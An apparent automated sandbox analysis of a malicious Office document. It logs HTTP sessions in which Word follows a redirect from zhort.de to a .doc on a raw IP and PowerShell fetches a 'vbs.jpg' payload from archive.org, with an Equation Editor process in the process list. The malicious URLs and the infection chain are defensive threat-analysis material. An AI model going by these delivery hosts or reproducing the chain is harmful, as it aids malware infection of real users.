                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 0
                                                                              Location: http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc
                                                                              Vary: Accept
                                                                              X-Served-By: zhort.de
                                                                              2024-08-28 20:29:19 UTC191INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 31 32 2e 38 31 2e 32 32 38 2f 36 30 30 2f 67 76 2f 73 72 65 65 6d 61 6e 67 61 6e 73 68 65 6b 75 6d 61 72 73 61 79 69 6e 67 62 75 74 74 65 72 73 6d 6f 6f 74 68 62 75 6e 6e 65 76 65 72 68 61 6e 64 6c 69 6e 67 74 68 65 73 77 65 65 74 6d 69 6c 6b 62 75 6e 77 68 69 63 68 72 65 61 6c 6c 79 74 61 73 74 79 77 69 74 68 62 75 74 74 65 72 73 6d 6f 6f 74 68 74 68 69 6e 67 73 5f 5f 5f 5f 5f 5f 5f 5f 5f 67 65 74 69 74 73 62 61 63 6b 74 6f 74 68 65 72 6f 61 64 77 69 74 68 2e 64 6f 63
                                                                              Data Ascii: Found. Redirecting to http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.224916388.99.66.384433816C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-08-28 20:29:21 UTC130OUTOPTIONS / HTTP/1.1
                                                                              User-Agent: Microsoft Office Protocol Discovery
                                                                              Host: zhort.de
                                                                              Content-Length: 0
                                                                              Connection: Keep-Alive
                                                                              2024-08-28 20:29:21 UTC450INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Wed, 28 Aug 2024 20:29:21 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 8
                                                                              Connection: close
                                                                              X-DNS-Prefetch-Control: off
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                              X-Download-Options: noopen
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Allow: GET,HEAD
                                                                              ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                              X-Served-By: zhort.de
                                                                              2024-08-28 20:29:21 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                                              Data Ascii: GET,HEAD


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.224916488.99.66.384433816C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-08-28 20:29:22 UTC115OUTHEAD /UlEYs1 HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                              Host: zhort.de
                                                                              2024-08-28 20:29:23 UTC593INHTTP/1.1 302 Found
                                                                              Server: openresty
                                                                              Date: Wed, 28 Aug 2024 20:29:22 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 191
                                                                              Connection: close
                                                                              X-DNS-Prefetch-Control: off
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                              X-Download-Options: noopen
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Location: http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc
                                                                              Vary: Accept
                                                                              X-Served-By: zhort.de


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              3192.168.2.224916588.99.66.38443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-08-28 20:29:27 UTC125OUTOPTIONS / HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                              translate: f
                                                                              Host: zhort.de
                                                                              2024-08-28 20:29:27 UTC450INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Wed, 28 Aug 2024 20:29:27 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 8
                                                                              Connection: close
                                                                              X-DNS-Prefetch-Control: off
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                              X-Download-Options: noopen
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Allow: GET,HEAD
                                                                              ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                              X-Served-By: zhort.de
                                                                              2024-08-28 20:29:27 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                                              Data Ascii: GET,HEAD


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              4192.168.2.224916688.99.66.38443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-08-28 20:29:28 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 7a 68 6f 72 74 2e 64 65 0d 0a 0d 0a
                                                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: zhort.de
                                                                              2024-08-28 20:29:29 UTC423INHTTP/1.1 404 Not Found
                                                                              Server: openresty
                                                                              Date: Wed, 28 Aug 2024 20:29:28 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 144
                                                                              Connection: close
                                                                              X-DNS-Prefetch-Control: off
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                              X-Download-Options: noopen
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Content-Security-Policy: default-src 'none'
                                                                              2024-08-28 20:29:29 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              5192.168.2.224916788.99.66.38443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-08-28 20:29:29 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 7a 68 6f 72 74 2e 64 65 0d 0a 0d 0a
                                                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: zhort.de
                                                                              2024-08-28 20:29:29 UTC423INHTTP/1.1 404 Not Found
                                                                              Server: openresty
                                                                              Date: Wed, 28 Aug 2024 20:29:29 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 144
                                                                              Connection: close
                                                                              X-DNS-Prefetch-Control: off
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                              X-Download-Options: noopen
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Content-Security-Policy: default-src 'none'
                                                                              2024-08-28 20:29:29 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.224916888.99.66.384433816C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-08-28 20:29:30 UTC134OUTHEAD /UlEYs1 HTTP/1.1
                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                              Host: zhort.de
                                                                              Content-Length: 0
                                                                              Connection: Keep-Alive
                                                                              2024-08-28 20:29:31 UTC593INHTTP/1.1 302 Found
                                                                              Server: openresty
                                                                              Date: Wed, 28 Aug 2024 20:29:30 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 191
                                                                              Connection: close
                                                                              X-DNS-Prefetch-Control: off
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                              X-Download-Options: noopen
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Location: http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc
                                                                              Vary: Accept
                                                                              X-Served-By: zhort.de


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.2249171207.241.232.1544432900C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-08-28 20:29:37 UTC111OUTGET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                                              Host: ia803104.us.archive.org
                                                                              Connection: Keep-Alive
                                                                              2024-08-28 20:29:37 UTC591INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0 (Ubuntu)
                                                                              Date: Wed, 28 Aug 2024 20:29:37 GMT
                                                                              Content-Type: image/jpeg
                                                                              Content-Length: 1931225
                                                                              Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                                              Connection: close
                                                                              ETag: "66a41ab4-1d77d9"
                                                                              Strict-Transport-Security: max-age=15724800
                                                                              Expires: Thu, 29 Aug 2024 02:29:37 GMT
                                                                              Cache-Control: max-age=21600
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                              Access-Control-Allow-Credentials: true
                                                                              Accept-Ranges: bytes
                                                                              2024-08-28 20:29:37 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                              2024-08-28 20:29:37 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                                              Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                                              2024-08-28 20:29:37 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                                              Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                                              Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                                              Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                                              Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                                              Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                                              Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                                              Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                                              Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:16:28:57
                                                                              Start date:28/08/2024
                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                              Imagebase:0x13f0e0000
                                                                              File size:28'253'536 bytes
                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:3
                                                                              Start time:16:29:19
                                                                              Start date:28/08/2024
                                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                                              Imagebase:0x13f1c0000
                                                                              File size:1'423'704 bytes
                                                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:8
                                                                              Start time:16:29:31
                                                                              Start date:28/08/2024
                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                              Imagebase:0x400000
                                                                              File size:543'304 bytes
                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
